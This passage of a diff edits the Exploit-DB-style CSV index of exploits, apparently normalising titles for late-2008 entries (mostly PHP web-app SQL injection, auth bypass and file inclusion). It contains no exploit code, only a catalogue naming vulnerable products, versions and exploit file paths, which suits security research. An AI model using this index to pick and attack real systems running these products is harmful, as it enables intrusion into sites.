Injection",2008-10-31,BeyazKurt,php,webapps,0 -6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory (cat_id) Remote SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory (cat_id) SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 -6910,platforms/php/webapps/6910.txt,"SFS EZ BIZ PRO (track.php id) Remote SQL Injection",2008-10-31,"Hussin X",php,webapps,0 -6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate (cat_id) Remote SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6910,platforms/php/webapps/6910.txt,"SFS EZ BIZ PRO (track.php id) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 +6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate (cat_id) SQL Injection",2008-10-31,d3b4g,php,webapps,0 6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 - (SQL Injection) Auth Bypass",2008-10-31,Hakxer,php,webapps,0 -6913,platforms/php/webapps/6913.txt,"SFS EZ Webring (cat) Remote SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not (phid) Remote SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6915,platforms/php/webapps/6915.txt,"SFS EZ Software (id) Remote SQL Injection",2008-10-31,x0r,php,webapps,0 -6916,platforms/php/webapps/6916.txt,"ModernBill <= 4.4.x - XSS / Remote File Inclusion",2008-10-31,nigh7f411,php,webapps,0 -6917,platforms/php/webapps/6917.php,"Article Publisher PRO (userid) Remote SQL Injection Exploit",2008-10-31,Stack,php,webapps,0 +6913,platforms/php/webapps/6913.txt,"SFS EZ Webring (cat) SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not (phid) SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6915,platforms/php/webapps/6915.txt,"SFS EZ Software (id) SQL Injection",2008-10-31,x0r,php,webapps,0 +6916,platforms/php/webapps/6916.txt,"ModernBill 4.4.x - XSS / Remote File Inclusion",2008-10-31,nigh7f411,php,webapps,0 +6917,platforms/php/webapps/6917.php,"Article Publisher PRO (userid) SQL Injection Exploit",2008-10-31,Stack,php,webapps,0 6918,platforms/php/webapps/6918.txt,"SFS EZ Auction (viewfaqs.php cat) Blind SQL Injection",2008-10-31,Stack,php,webapps,0 6919,platforms/php/webapps/6919.txt,"SFS EZ Career (content.php topic) SQL Injection",2008-10-31,Stack,php,webapps,0 -6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites (topsite.php ts) Remote SQL Injection",2008-10-31,Stack,php,webapps,0 +6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites (topsite.php ts) SQL Injection",2008-10-31,Stack,php,webapps,0 6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 writeFile() API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0 -6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore (where) Remote SQL Injection",2008-11-01,ZoRLu,php,webapps,0 +6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore (where) SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site (directory.php cat) SQL Injection",2008-11-01,Hakxer,php,webapps,0 -6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats (id) Remote SQL Injection",2008-11-01,ZoRLu,php,webapps,0 +6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats (id) SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server Response Remote Crash PoC",2008-11-01,DeltahackingTEAM,windows,dos,0 6927,platforms/php/webapps/6927.txt,"AJ ARTICLE (featured_article.php mode) SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 -6928,platforms/php/webapps/6928.txt,"Joomla Component Flash Tree Gallery 1.0 - RFI",2008-11-01,NoGe,php,webapps,0 +6928,platforms/php/webapps/6928.txt,"Joomla Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0 6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - (details.php id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6932,platforms/php/webapps/6932.txt,"AJ ARTICLE (SQL Injection) Remote Auth Bypass",2008-11-01,Hakxer,php,webapps,0 -6933,platforms/php/webapps/6933.pl,"Micro CMS <= 0.3.5 - Remote (Add/Delete/Password Change) Exploit",2008-11-01,StAkeR,php,webapps,0 +6933,platforms/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote (Add/Delete/Password Change) Exploit",2008-11-01,StAkeR,php,webapps,0 6934,platforms/php/webapps/6934.txt,"Shahrood (ndetail.php id) Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps,0 -6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder (id) Remote SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6936,platforms/php/webapps/6936.txt,"YourFreeWorld Banner Management (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6937,platforms/php/webapps/6937.txt,"YourFreeWorld Blog Blaster (id) Remote SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6937,platforms/php/webapps/6937.txt,"YourFreeWorld Blog Blaster (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6938,platforms/php/webapps/6938.txt,"YourFreeWorld Autoresponder Hosting (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6939,platforms/php/webapps/6939.txt,"YourFreeWorld Forced Matrix Script (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6940,platforms/php/webapps/6940.txt,"YourFreeWorld Short Url & Url Tracker - (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 @@ -6509,11 +6509,11 @@ id,file,description,date,author,platform,type,port 6942,platforms/php/webapps/6942.txt,"YourFreeWorld Scrolling Text Ads (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6943,platforms/php/webapps/6943.txt,"YourFreeWorld Reminder Service (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6944,platforms/php/webapps/6944.txt,"YourFreeWorld Classifieds Blaster (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6945,platforms/php/webapps/6945.txt,"YourFreeWorld Classifieds (category) Remote SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6946,platforms/php/webapps/6946.txt,"Downline Goldmine Builder (tr.php id) Remote SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6945,platforms/php/webapps/6945.txt,"YourFreeWorld Classifieds (category) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6946,platforms/php/webapps/6946.txt,"Downline Goldmine Builder (tr.php id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6947,platforms/php/webapps/6947.txt,"Downline Goldmine Category Addon (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6948,platforms/php/webapps/6948.txt,"YourFreeWorld Classifieds Hosting (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6949,platforms/php/webapps/6949.txt,"YourFreeWorld URL Rotator (id) Remote SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6949,platforms/php/webapps/6949.txt,"YourFreeWorld URL Rotator (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6950,platforms/php/webapps/6950.txt,"Downline Goldmine paidversion (tr.php id) - SQL Injection",2008-11-02,"Hussin X",php,webapps,0 6951,platforms/php/webapps/6951.txt,"Downline Goldmine newdownlinebuilder - (tr.php id) SQL Injection",2008-11-02,"Hussin X",php,webapps,0 6952,platforms/php/webapps/6952.txt,"YourFreeWorld Shopping Cart - (index.php c) Blind SQL Injection",2008-11-02,"Hussin X",php,webapps,0 @@ -6521,103 +6521,103 @@ id,file,description,date,author,platform,type,port 6954,platforms/php/webapps/6954.txt,"Maran PHP Shop (admin.php) Insecure Cookie Handling",2008-11-02,JosS,php,webapps,0 6955,platforms/php/webapps/6955.txt,"Joovili 3.1.4 Insecure Cookie Handling",2008-11-02,ZoRLu,php,webapps,0 6956,platforms/php/webapps/6956.txt,"apartment search script - (RFU/XSS) Multiple Vulnerabilities",2008-11-02,ZoRLu,php,webapps,0 -6957,platforms/php/webapps/6957.txt,"NetRisk <= 2.0 - (XSS/SQL Injection) Remote Vulnerabilities",2008-11-02,StAkeR,php,webapps,0 +6957,platforms/php/webapps/6957.txt,"NetRisk 2.0 - (XSS/SQL Injection) Remote Vulnerabilities",2008-11-02,StAkeR,php,webapps,0 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop (prodshow.php) SQL Injection",2008-11-02,d3v1l,php,webapps,0 -6960,platforms/php/webapps/6960.txt,"1st News - (products.php id) Remote SQL Injection",2008-11-02,TR-ShaRk,php,webapps,0 +6960,platforms/php/webapps/6960.txt,"1st News - (products.php id) SQL Injection",2008-11-02,TR-ShaRk,php,webapps,0 6961,platforms/php/webapps/6961.pl,"DZCP (deV!L_z Clanportal) <= 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,anonymous,php,webapps,0 6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds (cat_id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0 6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6965,platforms/php/webapps/6965.txt,"Acc Statistics 1.1Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 -6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b (view.php id) Remote SQL Injection",2008-11-03,ZoRLu,php,webapps,0 +6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b (view.php id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 Insecure Cookie Handling",2008-11-03,x0r,php,webapps,0 6969,platforms/php/webapps/6969.txt,"Apoll 0.7b (SQL Injection) Remote Auth Bypass",2008-11-03,ZoRLu,php,webapps,0 6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - (Blind SQL Injection/XSS) Multiple Vulnerabilities",2008-11-03,Hakxer,php,webapps,0 -6972,platforms/php/webapps/6972.txt,"pppBlog <= 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0 +6972,platforms/php/webapps/6972.txt,"pppBlog 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0 6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 - (index.php content) Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - (SQL/XSS) Multiple Vulnerabilities",2008-11-04,G4N0K,php,webapps,0 -6975,platforms/php/webapps/6975.txt,"Joomla Component VirtueMart Google Base 1.1 - RFI",2008-11-04,NoGe,php,webapps,0 -6976,platforms/php/webapps/6976.txt,"Joomla Component ongumatimesheet20 4b - RFI",2008-11-04,NoGe,php,webapps,0 -6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card <= 1.02 - (catid) SQL Injection",2008-11-04,"Hussin X",php,webapps,0 -6978,platforms/php/webapps/6978.txt,"Vibro-CMS - Multiple Remote SQL Injection Vulnerabilities",2008-11-04,StAkeR,php,webapps,0 +6975,platforms/php/webapps/6975.txt,"Joomla Component VirtueMart Google Base 1.1 - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0 +6976,platforms/php/webapps/6976.txt,"Joomla Component ongumatimesheet20 4b - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0 +6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - (catid) SQL Injection",2008-11-04,"Hussin X",php,webapps,0 +6978,platforms/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injection Vulnerabilities",2008-11-04,StAkeR,php,webapps,0 6979,platforms/php/webapps/6979.txt,"nicLOR Puglia Landscape (id) Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 6980,platforms/php/webapps/6980.txt,"Joomla Component ProDesk 1.0/1.2 - Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 -6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS (nID) Remote SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 -6982,platforms/php/webapps/6982.txt,"CMS-School 2005 - (showarticle.php) Remote SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 +6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS (nID) SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 +6982,platforms/php/webapps/6982.txt,"CMS-School 2005 - (showarticle.php) SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 6983,platforms/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - (SQL Injection) Auth Bypass",2008-11-04,Hakxer,php,webapps,0 6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - (SQL Injection) Auth Bypass",2008-11-04,Hakxer,php,webapps,0 -6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz <= 1.02 - (Auth Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 -6986,platforms/php/webapps/6986.txt,"WEBBDOMAIN Webshop <= 1.02 - (SQL Injection) Auth Bypass",2008-11-04,Hakxer,php,webapps,0 +6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz 1.02 - (Auth Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 +6986,platforms/php/webapps/6986.txt,"WEBBDOMAIN Webshop 1.02 - (SQL Injection) Auth Bypass",2008-11-04,Hakxer,php,webapps,0 6987,platforms/php/webapps/6987.txt,"Simple Document Management System 1.1.4 - SQL Injection Auth Bypass",2008-11-04,Yuri,php,webapps,0 6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - (cityview.php cityid) SQL Injection",2008-11-04,G4N0K,php,webapps,0 -6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card <= 1.02 - (SQL Injection) Auth Bypass",2008-11-04,x0r,php,webapps,0 +6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - (SQL Injection) Auth Bypass",2008-11-04,x0r,php,webapps,0 6990,platforms/php/webapps/6990.txt,"nicLOR Sito includefile Local File Inclusion Vulnerabilities",2008-11-04,StAkeR,php,webapps,0 -6991,platforms/php/webapps/6991.txt,"TR News <= 2.1 - (login.php) Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0 -6992,platforms/php/webapps/6992.txt,"wotw <= 5.0 - Local/Remote File Inclusion",2008-11-04,dun,php,webapps,0 +6991,platforms/php/webapps/6991.txt,"TR News 2.1 - (login.php) Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0 +6992,platforms/php/webapps/6992.txt,"wotw 5.0 - Local/Remote File Inclusion",2008-11-04,dun,php,webapps,0 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 Code Execution Exploit",2008-11-04,"Charles Fol",php,webapps,0 6994,platforms/windows/local/6994.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow Exploit",2008-11-05,Elazar,windows,local,0 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,php,webapps,0 -6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 - (news_id) Remote SQL Injection Exploit",2008-11-05,StAkeR,php,webapps,0 +6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 - (news_id) SQL Injection Exploit",2008-11-05,StAkeR,php,webapps,0 6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal (Tour.php id) SQL Injection",2008-11-05,G4N0K,php,webapps,0 6998,platforms/php/webapps/6998.txt,"Pre Shopping Mall Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 6999,platforms/php/webapps/6999.txt,"pre multi-vendor shopping malls - Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 7000,platforms/php/webapps/7000.txt,"Pre Classified Listings Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 -7001,platforms/php/webapps/7001.txt,"DFLabs PTK <= 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0 -7002,platforms/php/webapps/7002.txt,"Joomla Component Dada Mail Manager 2.6 - RFI",2008-11-05,NoGe,php,webapps,0 +7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0 +7002,platforms/php/webapps/7002.txt,"Joomla Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings (moreinfo.php pg) SQL Injection",2008-11-05,G4N0K,php,webapps,0 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS (Auth Bypass) SQL Injection",2008-11-05,"Hussin X",php,webapps,0 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO (Auth Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7006,platforms/windows/local/7006.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow Exploit (2)",2008-11-05,"Debasis Mohanty",windows,local,0 -7007,platforms/php/webapps/7007.txt,"HarlandScripts drinks (recid) Remote SQL Injection Velnerability",2008-11-05,"Ex Tacy",php,webapps,0 +7007,platforms/php/webapps/7007.txt,"HarlandScripts drinks (recid) SQL Injection Velnerability",2008-11-05,"Ex Tacy",php,webapps,0 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings (Auth Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - (Auth Bypass) SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 -7011,platforms/php/webapps/7011.pl,"Simple Machines Forum <= 1.1.6 - (LFI) Code Execution Exploit",2008-11-05,~elmysterio,php,webapps,0 +7011,platforms/php/webapps/7011.pl,"Simple Machines Forum 1.1.6 - (LFI) Code Execution Exploit",2008-11-05,~elmysterio,php,webapps,0 7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion Vulnerabilities",2008-11-06,Nine:Situations:Group,php,webapps,0 7013,platforms/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injection Vulnerabilities",2008-11-06,InjEctOr5,php,webapps,0 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection Vulnerabilities",2008-11-06,InjEctOr5,php,webapps,0 7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Auth Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection Vulnerabilities",2008-11-06,InjEctOr5,php,webapps,0 -7017,platforms/php/webapps/7017.txt,"Pre ADS Portal <= 2.0 - (Auth Bypass/XSS) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 +7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - (Auth Bypass/XSS) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 7018,platforms/php/webapps/7018.txt,"NICE FAQ Script (Auth Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0 7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps,0 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0 7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - (Auth Bypass) SQL Injection",2008-11-06,Cyber-Zone,php,webapps,0 7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final Arbitrary File Delete",2008-11-06,cOndemned,php,webapps,0 -7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds <= 7.5 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 -7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links <= 1.3 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 +7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds 7.5 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 +7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links 1.3 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7025,platforms/php/webapps/7025.txt,"DeltaScripts PHP Shop 1.0 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery (ctg) SQL Injection",2008-11-06,"Hussin X",php,webapps,0 7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - (XSS/SQL) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 7028,platforms/php/webapps/7028.txt,"turnkeyforms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0 7029,platforms/php/webapps/7029.txt,"turnkeyforms Business Survey Pro 1.0 - (id) SQL Injection",2008-11-07,G4N0K,php,webapps,0 7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - (manufacturers_id) Script SQL Injection",2008-11-07,InjEctOr5,php,webapps,0 -7031,platforms/php/webapps/7031.php,"e-Vision CMS <= 2.0.2 - Multiple Local File Inclusion Exploit",2008-11-07,StAkeR,php,webapps,0 +7031,platforms/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusion Exploit",2008-11-07,StAkeR,php,webapps,0 7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 - Auth Bypass",2008-11-07,G4N0K,php,webapps,0 7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Auth Bypass",2008-11-07,G4N0K,php,webapps,0 7034,platforms/php/webapps/7034.txt,"U&M Software Event Lister 1.0 - Auth Bypass",2008-11-07,G4N0K,php,webapps,0 7035,platforms/php/webapps/7035.txt,"turnkeyforms Local Classifieds - (XSS/SQL) Multiple Vulnerabilities",2008-11-07,TR-ShaRk,php,webapps,0 -7038,platforms/php/webapps/7038.txt,"Joomla Component Clickheat 1.0.1 - Multiple RFI Vulnerabilities",2008-11-07,NoGe,php,webapps,0 -7039,platforms/php/webapps/7039.txt,"Joomla Component Recly!Competitions 1.0.0 - Multiple RFI Vulnerabilities",2008-11-07,NoGe,php,webapps,0 -7040,platforms/php/webapps/7040.txt,"Joomla Component Feederator 1.0.5 - Multiple RFI Vulnerabilities",2008-11-07,NoGe,php,webapps,0 +7038,platforms/php/webapps/7038.txt,"Joomla Component Clickheat 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-11-07,NoGe,php,webapps,0 +7039,platforms/php/webapps/7039.txt,"Joomla Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusion Vulnerabilities",2008-11-07,NoGe,php,webapps,0 +7040,platforms/php/webapps/7040.txt,"Joomla Component Feederator 1.0.5 - Multiple Remote File Inclusion Vulnerabilities",2008-11-07,NoGe,php,webapps,0 7041,platforms/php/webapps/7041.txt,"E-topbiz Online Store 1 - (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7042,platforms/php/webapps/7042.txt,"PHP Auto Listings Script - (Auth Bypass) SQL Injection",2008-11-07,r45c4l,php,webapps,0 7043,platforms/php/webapps/7043.txt,"Mole Group Rental Script - (Auth Bypass) SQL Injection",2008-11-07,Cyber-Zone,php,webapps,0 7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 -7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection",2008-11-07,ZoRLu,php,webapps,0 -7047,platforms/php/webapps/7047.txt,"DeltaScripts PHP Classifieds <= 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0 +7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 +7047,platforms/php/webapps/7047.txt,"DeltaScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - (cat_id) SQL Injection",2008-11-07,Stack,php,webapps,0 7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - (File Disclosure/XSS) Multiple Vulnerabilities",2008-11-07,ahmadbady,php,webapps,0 -7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - (id) Remote SQL Injection",2008-11-07,"Hussin X",php,webapps,0 +7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - (id) SQL Injection",2008-11-07,"Hussin X",php,webapps,0 7051,platforms/windows/local/7051.pl,"VLC Media Player < 0.9.6 - (.rt) Stack Buffer Overflow Exploit",2008-11-07,SkD,windows,local,0 -7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - (id) Remote SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 +7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - (id) SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - (AKEProtect.sys) Privilege Escalation Exploit",2008-11-07,"NT Internals",windows,local,0 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal Credentials Leak Sniffer (Metasploit)",2008-11-08,"Kevin Finisterre",windows,remote,0 -7057,platforms/php/webapps/7057.pl,"MemHT Portal <= 4.0 - Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0 +7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - (upload/XSS) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0 7060,platforms/hardware/dos/7060.txt,"2Wire DSL Router (xslt) - Denial of Service",2008-11-08,hkm,hardware,dos,0 @@ -6625,16 +6625,16 @@ id,file,description,date,author,platform,type,port 7062,platforms/php/webapps/7062.txt,"ZEEJOBSITE 2.0 - Remote File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form (form_id) Blind SQL Injection Exploit",2008-11-08,boom3rang,php,webapps,0 -7065,platforms/php/webapps/7065.txt,"Cyberfolio <= 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0 +7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Auth Bypass",2008-11-08,G4N0K,php,webapps,0 -7067,platforms/asp/webapps/7067.txt,"DigiAffiliate <= 1.4 - (Auth Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0 +7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Auth Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0 7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - (Auth Bypass) SQL Injection",2008-11-08,Cyber-Zone,php,webapps,0 7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling",2008-11-08,Cyber-Zone,php,webapps,0 7070,platforms/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 - Auth Bypass",2008-11-08,Stack,php,webapps,0 7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 